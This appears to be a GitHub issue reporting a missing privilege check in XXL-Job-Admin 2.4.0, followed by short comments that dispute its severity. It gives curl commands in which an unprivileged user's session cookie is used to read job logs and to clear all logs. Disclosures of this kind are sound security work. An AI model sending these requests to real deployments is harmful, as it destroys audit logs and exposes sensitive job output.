Permission Vulnerability of Path /xxl-job-admin/joblog/clearLog & /xxl-job-admin/joblog/logDetailCat

[N0th1n3]

Environment

MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

Vulnerability Information

It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validate user privilege and induces risk of sensitive information leakage and loss.

Steps to reproduce the behavior

Step 1: Create a normal user without any privilege inside the web console as below

Step 2: Retrieve the cookie for the user

Step 3: Run the following command for testing log query
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'

It can show the successful log query and return 200 status.

Step 4: Run the following command for log clearing
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'

it will return 200 status.

Step 5. Show the log in the console. It will show that all log is cleared successfully by normal user.

[75ACOL]

Create an unprivileged user and get its cookie, which I don't think is easy for attackers.

[N0th1n3]

Agree. The assumption of the attack is that you gained an unprivileged account.

[jiakun02]

那2个接口本来就是提供可读的吧，就像linux系统/etc/passwd对所有用户可执行一样，如果这也算漏洞，那我假设我已经用普通用户ssh登录了服务器，然后能读取/ etc/passwd，那我现在说linux系统有漏洞，我去呼叫Torvalds